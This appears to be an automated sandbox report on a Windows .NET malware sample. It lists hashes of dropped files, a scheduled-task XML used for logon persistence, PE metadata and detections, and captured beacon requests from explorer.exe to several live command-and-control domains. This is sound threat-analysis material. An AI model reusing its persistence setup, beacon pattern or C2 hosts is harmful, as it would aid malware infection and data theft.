SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o2v54dpy.txx.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp7F5F.tmp

Download File

Process:	C:\Users\user\Desktop\22#U0415.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1576
Entropy (8bit):	5.1006173591513715
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtacxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTNv
MD5:	062EC493BA132EF4D65046FE3885DB42
SHA1:	1832AD28A4B5ED522052A5AF4E41B112B1E70BE3
SHA-256:	21A21904C56D2432F3B47E4523BF2AB89CD2BF903E7DB04298418F18BA3DCBBE
SHA-512:	C5AD30FF217E8BA3E756D84939C7F5720FA21A179D0F1C7EF841535BFA5A6DE197531AD5D5A6304C8630497EF68A0F26C64021DA56DFCF46781FFADDEF7B3398
Malicious:	true
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Local\Temp\tmp8942.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\tsnokiirph.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1576
Entropy (8bit):	5.1006173591513715
Encrypted:	false
SSDEEP:	24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtacxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTNv
MD5:	062EC493BA132EF4D65046FE3885DB42
SHA1:	1832AD28A4B5ED522052A5AF4E41B112B1E70BE3
SHA-256:	21A21904C56D2432F3B47E4523BF2AB89CD2BF903E7DB04298418F18BA3DCBBE
SHA-512:	C5AD30FF217E8BA3E756D84939C7F5720FA21A179D0F1C7EF841535BFA5A6DE197531AD5D5A6304C8630497EF68A0F26C64021DA56DFCF46781FFADDEF7B3398
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

C:\Users\user\AppData\Roaming\tsnokiirph.exe

Download File

Process:	C:\Users\user\Desktop\22#U0415.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1198080
Entropy (8bit):	7.279460823881027
Encrypted:	false
SSDEEP:	24576:wXq940K/L+pJYpqien8oYx0/cGVKsYcD2z:w0JWLTAwsN2z
MD5:	E870ACD8E63F0BB015C54447DCC8202A
SHA1:	C9580BAD08F952929AAD6948EC99FE21727C5943
SHA-256:	3D563BBC7B98DD20DE29D4564C65EEED992F79B5F745078417063138ADA4F6BA
SHA-512:	3F7347A201B73FB58B7298C34CE37880812B7D654003DA8779606EAB8F76E7C618FFD769DCB4E63B70281AF017E64911D04B5C9DCCE0173895C2937904C77989
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 32%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....hne..............0..<..........^Z... ...`....@.. ....................................@..................................Z..W....`..@............................................................................ ............... ..H............text...d:... ...<.................. ..`.rsrc...@....`.......>..............@..@.reloc...............F..............@..B................@Z......H...........\.......h...pe..8X..........................................I..7...........Ue#.%k.'....Bo.<.-.xY.t.J.........T.NRG,.4......g.[...0..=....IT.c<....Q.....G.2k..'..G.t{.p.".$-V..nIAW.".....p..x<...}y..R.e...".....Q...3...q..p....e ./d.k....,.....&(3.4.T.%{....m.h@s.KM.l=......['.)........1bAN\Q._...e.....".a...L..[]6......4.nC".C..o....a.......5n..M2.O.I.q..I.<...........dA..E.v?.[Rh.....}l8A......J'.K.`...U...J.^....Rz(y...Q....e.\|.......

C:\Users\user\AppData\Roaming\tsnokiirph.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\22#U0415.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.279460823881027
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	22#U0415.exe
File size:	1'198'080 bytes
MD5:	e870acd8e63f0bb015c54447dcc8202a
SHA1:	c9580bad08f952929aad6948ec99fe21727c5943
SHA256:	3d563bbc7b98dd20de29d4564c65eeed992f79b5f745078417063138ada4f6ba
SHA512:	3f7347a201b73fb58b7298c34ce37880812b7d654003da8779606eab8f76e7c618ffd769dcb4e63b70281af017e64911d04b5c9dcce0173895c2937904c77989
SSDEEP:	24576:wXq940K/L+pJYpqien8oYx0/cGVKsYcD2z:w0JWLTAwsN2z
TLSH:	CB4529AD3650B5DFC857CD76CAA41C64EA60B8BB830BD213A01716ED994DA9BCF140F3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....hne..............0..<..........^Z... ...`....@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x525a5e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x656E68C0 [Tue Dec 5 00:03:12 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x125a04	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x126000	0x640	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x128000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x123a64	0x123c00	False	0.7000120501285347	data	7.284920304624236	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x126000	0x640	0x800	False	0.33935546875	data	3.4937691896423764	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x128000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1260a0	0x3b0	data			0.4163135593220339
RT_MANIFEST	0x126450	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2023 10:43:34.219237089 CET	49739	80	192.168.2.4	23.80.45.39
Dec 5, 2023 10:43:34.381354094 CET	80	49739	23.80.45.39	192.168.2.4
Dec 5, 2023 10:43:34.381570101 CET	49739	80	192.168.2.4	23.80.45.39
Dec 5, 2023 10:43:34.381767988 CET	49739	80	192.168.2.4	23.80.45.39
Dec 5, 2023 10:43:34.546310902 CET	80	49739	23.80.45.39	192.168.2.4
Dec 5, 2023 10:43:34.546370983 CET	80	49739	23.80.45.39	192.168.2.4
Dec 5, 2023 10:43:34.546410084 CET	80	49739	23.80.45.39	192.168.2.4
Dec 5, 2023 10:43:34.546438932 CET	49739	80	192.168.2.4	23.80.45.39
Dec 5, 2023 10:43:34.546446085 CET	80	49739	23.80.45.39	192.168.2.4
Dec 5, 2023 10:43:34.546479940 CET	80	49739	23.80.45.39	192.168.2.4
Dec 5, 2023 10:43:34.546515942 CET	49739	80	192.168.2.4	23.80.45.39
Dec 5, 2023 10:43:34.546541929 CET	49739	80	192.168.2.4	23.80.45.39
Dec 5, 2023 10:43:34.546541929 CET	49739	80	192.168.2.4	23.80.45.39
Dec 5, 2023 10:43:34.708364964 CET	80	49739	23.80.45.39	192.168.2.4
Dec 5, 2023 10:44:13.236694098 CET	49741	80	192.168.2.4	103.224.212.212
Dec 5, 2023 10:44:13.396831036 CET	80	49741	103.224.212.212	192.168.2.4
Dec 5, 2023 10:44:13.396934986 CET	49741	80	192.168.2.4	103.224.212.212
Dec 5, 2023 10:44:13.397020102 CET	49741	80	192.168.2.4	103.224.212.212
Dec 5, 2023 10:44:13.584717035 CET	80	49741	103.224.212.212	192.168.2.4
Dec 5, 2023 10:44:13.584762096 CET	80	49741	103.224.212.212	192.168.2.4
Dec 5, 2023 10:44:13.584872007 CET	49741	80	192.168.2.4	103.224.212.212
Dec 5, 2023 10:44:13.584943056 CET	49741	80	192.168.2.4	103.224.212.212
Dec 5, 2023 10:44:13.745302916 CET	80	49741	103.224.212.212	192.168.2.4
Dec 5, 2023 10:44:53.748585939 CET	49742	80	192.168.2.4	15.197.142.173
Dec 5, 2023 10:44:53.846115112 CET	80	49742	15.197.142.173	192.168.2.4
Dec 5, 2023 10:44:53.846221924 CET	49742	80	192.168.2.4	15.197.142.173
Dec 5, 2023 10:44:53.846283913 CET	49742	80	192.168.2.4	15.197.142.173
Dec 5, 2023 10:44:53.943259001 CET	80	49742	15.197.142.173	192.168.2.4
Dec 5, 2023 10:44:53.943591118 CET	80	49742	15.197.142.173	192.168.2.4
Dec 5, 2023 10:44:53.943627119 CET	80	49742	15.197.142.173	192.168.2.4
Dec 5, 2023 10:44:53.943681002 CET	49742	80	192.168.2.4	15.197.142.173
Dec 5, 2023 10:44:53.943700075 CET	49742	80	192.168.2.4	15.197.142.173
Dec 5, 2023 10:44:54.040363073 CET	80	49742	15.197.142.173	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2023 10:43:34.004668951 CET	55448	53	192.168.2.4	1.1.1.1
Dec 5, 2023 10:43:34.217067957 CET	53	55448	1.1.1.1	192.168.2.4
Dec 5, 2023 10:44:13.002270937 CET	65520	53	192.168.2.4	1.1.1.1
Dec 5, 2023 10:44:13.235902071 CET	53	65520	1.1.1.1	192.168.2.4
Dec 5, 2023 10:44:33.111846924 CET	57880	53	192.168.2.4	1.1.1.1
Dec 5, 2023 10:44:33.403265953 CET	53	57880	1.1.1.1	192.168.2.4
Dec 5, 2023 10:44:53.564905882 CET	52525	53	192.168.2.4	1.1.1.1
Dec 5, 2023 10:44:53.747648954 CET	53	52525	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 5, 2023 10:43:34.004668951 CET	192.168.2.4	1.1.1.1	0x1547	Standard query (0)	www.v72999.com	A (IP address)	IN (0x0001)	false
Dec 5, 2023 10:44:13.002270937 CET	192.168.2.4	1.1.1.1	0x3b73	Standard query (0)	www.theanhedonia.com	A (IP address)	IN (0x0001)	false
Dec 5, 2023 10:44:33.111846924 CET	192.168.2.4	1.1.1.1	0x8a86	Standard query (0)	www.harborspringsfire.com	A (IP address)	IN (0x0001)	false
Dec 5, 2023 10:44:53.564905882 CET	192.168.2.4	1.1.1.1	0xefa4	Standard query (0)	www.alterdpxlmarketing.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 5, 2023 10:43:34.217067957 CET	1.1.1.1	192.168.2.4	0x1547	No error (0)	www.v72999.com		23.80.45.39	A (IP address)	IN (0x0001)	false
Dec 5, 2023 10:44:13.235902071 CET	1.1.1.1	192.168.2.4	0x3b73	No error (0)	www.theanhedonia.com		103.224.212.212	A (IP address)	IN (0x0001)	false
Dec 5, 2023 10:44:33.403265953 CET	1.1.1.1	192.168.2.4	0x8a86	Name error (3)	www.harborspringsfire.com	none	none	A (IP address)	IN (0x0001)	false
Dec 5, 2023 10:44:53.747648954 CET	1.1.1.1	192.168.2.4	0xefa4	No error (0)	www.alterdpxlmarketing.com	alterdpxlmarketing.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 5, 2023 10:44:53.747648954 CET	1.1.1.1	192.168.2.4	0xefa4	No error (0)	alterdpxlmarketing.com		15.197.142.173	A (IP address)	IN (0x0001)	false
Dec 5, 2023 10:44:53.747648954 CET	1.1.1.1	192.168.2.4	0xefa4	No error (0)	alterdpxlmarketing.com		3.33.152.147	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.v72999.com

www.theanhedonia.com

www.alterdpxlmarketing.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49739	23.80.45.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2023 10:43:34.381767988 CET	222	OUT	GET /gy14/?8pB8=qN98lNP8T4bXSv70&NBZlJ=y7EXzckSInqxOjpGcfAId1VUK6tUhu58CGMbocv7TQhRUEwsApxFieb+ctLyVVSqDnLX HTTP/1.1 Host: www.v72999.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 5, 2023 10:43:34.546310902 CET	1340	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 05 Dec 2023 09:43:37 GMT Content-Type: text/html Content-Length: 4342 Connection: close Vary: Accept-Encoding Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 b2 fd b6 bc cb ce b0 d1 cd b6 d7 ca b9 dc c0 ed d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 2c 26 23 32 32 39 30 39 3b 26 23 32 34 38 31 39 3b 26 23 32 34 33 32 34 3b 26 23 32 32 33 35 31 3b 26 23 32 30 33 32 30 3b 26 23 31 31 36 3b 26 23 31 32 30 3b 26 23 31 31 36 3b 26 23 31 39 39 37 39 3b 26 23 33 36 37 33 33 3b 26 23 33 30 30 30 35 3b 26 23 32 33 33 37 36 3b 26 23 32 30 30 37 30 3b 2c 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 37 34 33 31 3b 26 23 33 32 36 35 34 3b 26 23 32 38 36 30 38 3b 26 23 32 34 37 37 33 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 2c 26 23 33 37 33 32 36 3b 26 23 33 33 34 35 37 3b 26 23 32 34 34 33 33 3b 26 23 33 35 32 37 30 3b 26 23 32 32 38 32 33 3b 26 23 32 30 38 34 30 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 26 23 32 30 38 31 33 3b 26 23 33 36 31 35 33 3b 26 23 33 39 36 34 30 3b 26 23 32 38 31 36 35 3b 26 23 34 39 3b 2c 26 23 32 36 30 38 35 3b 26 23 32 36 34 31 32 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 31 39 39 37 37 3b 26 23 32 31 33 30 36 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 33 35 32 36 36 3b 26 23 33 30 34 37 35 3b 2c 26 23 32 35 31 30 35 3b 26 23 32 30 32 30 34 3b 26 23 33 32 34 32 32 3b 26 23 32 30 32 35 30 3b 26 23 32 31 35 34 33 3b 26 23 33 32 3b 26 23 33 30 30 30 35 3b 26 23 32 34 34 33 33 3b 2c 26 23 32 30 32 33 34 3b 26 23 32 30 31 35 34 3b 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 32 38 32 33 3b 2c 26 23 33 34 30 38 31 3b 26 23 33 38 31 39 39 3b 26 23 31 39 39 38 32 3b 26 23 32 33 35 36 37 3b 26 23 32 30 39 36 34 3b 26 23 32 30 31 38 35 3b 26 23 31 39 39 37 39 3b 26 23 33 36 37 33 33 3b 2c 26 23 32 30 30 36 31 3b 26 23 33 38 34 35 31 3b 26 23 33 30 34 39 35 3b 26 23 33 32 34 36 33 3b 26 23 33 30 30 30 35 3b 26 23 33 35 32 37 30 3b 26 23 32 31 30 39 35 3b 2c 26 23 33 31 35 33 32 3b 26 23 31 39 39 36 38 3b 26 23 33 31 31 31 39 3b 26 23 32 31 30 33 33 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 32 37 37 30 34 3b 26 23 32 30 30 33 37 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 30 31 36 3b 26 23 32 38 33 38 35 3b 26 23 32 30 31 35 34 3b 26 23 32 32 39 37 31 3b 26 23 32 39 30 38 37 3b 26 23 32 32 39 31 39 3b 26 23 32 30 30 38 31 3b 26 23 32 31 34 34 38 3b 26 23 32 30 32 36 32 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 39 37 3b 26 23 31 31 32 3b 26 23 31 31 32 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2c 26 23 32 32 39 30 39 3b 26 23 32 34 38 31 39 3b 26 23 32 34 33 32 34 3b 26 23 32 32 33 35 31 3b 26 23 32 30 33 32 30 3b 26 23 31 31 36 3b 26 23 31 32 30 3b 26 23 31 31 36 3b 26 23 31 39 39 37 39 3b 26 23 33 36 37 33 33 3b 26 23 33 30 30 30 35 3b 26 23 32 33 33 37 36 3b 26 23 32 30 30 37 30 3b 2c 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 37 34 33 31 3b 26 23 33 32 36 35 34 3b 26 23 32 38 36 30 38 3b 26 23 32 34 37 37 33 3b 26 23 33 31 39 33 34 3b 26 Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>,好想弄坏你txt下载电子书,精品欧美激情精品一区,野花影视大全在线观看免费高清1,日本一区二区三区在线观看,我们约会吧电影,伊人久久大,蔡锷与小凤仙下载,九阳真经电视剧,第一福利在线永久视频,丰满人妻熟妇乱又伦精品app</title><meta name="keywords" content=",好想弄坏你txt下载电子书,精品欧美激情精&
Dec 5, 2023 10:43:34.546370983 CET	1340	IN	Data Raw: 23 32 31 36 39 37 3b 26 23 31 39 39 36 38 3b 26 23 32 31 33 30 36 3b 2c 26 23 33 37 33 32 36 3b 26 23 33 33 34 35 37 3b 26 23 32 34 34 33 33 3b 26 23 33 35 32 37 30 3b 26 23 32 32 38 32 33 3b 26 23 32 30 38 34 30 3b 26 23 32 32 33 31 32 3b 26 23 Data Ascii: #21697;一区,野花影视大全在线观看免费高清1,日本一区二区三区在线观看,&#25
Dec 5, 2023 10:43:34.546410084 CET	1340	IN	Data Raw: 26 23 33 30 30 30 35 3b 26 23 33 35 32 37 30 3b 26 23 32 31 30 39 35 3b 2c 26 23 33 31 35 33 32 3b 26 23 31 39 39 36 38 3b 26 23 33 31 31 31 39 3b 26 23 32 31 30 33 33 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 32 37 37 30 34 3b 26 Data Ascii: 电视剧,第一福利在线永久视频,丰满人妻熟妇乱又伦精品app,飘花理&#35770
Dec 5, 2023 10:43:34.546446085 CET	698	IN	Data Raw: 30 30 31 33 3b 26 23 32 35 39 39 31 3b 26 23 32 33 34 34 38 3b 26 23 32 36 30 34 31 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 2c 26 23 32 34 34 30 33 3b 26 23 33 30 35 32 38 3b 26 23 32 36 33 37 39 3b 26 23 32 31 34 35 31 3b 26 23 33 30 Data Ascii: 0013;文官方网站,当着朋友的面要我,被邻居侵犯性HD中文字幕,日韩在线视&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49741	103.224.212.212	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2023 10:44:13.397020102 CET	228	OUT	GET /gy14/?8pB8=qN98lNP8T4bXSv70&NBZlJ=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58 HTTP/1.1 Host: www.theanhedonia.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Dec 5, 2023 10:44:13.584717035 CET	492	IN	HTTP/1.1 302 Found date: Tue, 05 Dec 2023 09:44:13 GMT server: Apache set-cookie: __tad=1701769453.1855751; expires=Fri, 02-Dec-2033 09:44:13 GMT; Max-Age=315360000 location: http://ww25.theanhedonia.com/gy14/?8pB8=qN98lNP8T4bXSv70&NBZlJ=sJB9xXC4L0bq2ox6VvMPyoOL09k0Ht7qJDXT7N+Z0c0oohLZUl68J6Fs633JlGPbuQ58&subid1=20231205-2044-13b4-848e-08210d79d381 content-length: 2 content-type: text/html; charset=UTF-8 connection: close Data Raw: 0a 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49742	15.197.142.173	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2023 10:44:53.846283913 CET	234	OUT	GET /gy14/?8pB8=qN98lNP8T4bXSv70&NBZlJ=J9/jgP9Re4KtuF0AsBPpjtalVscOAyQ/qvU9Qh627akK0Y3++VNxqCagaMddKEOxon78 HTTP/1.1 Host: www.alterdpxlmarketing.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
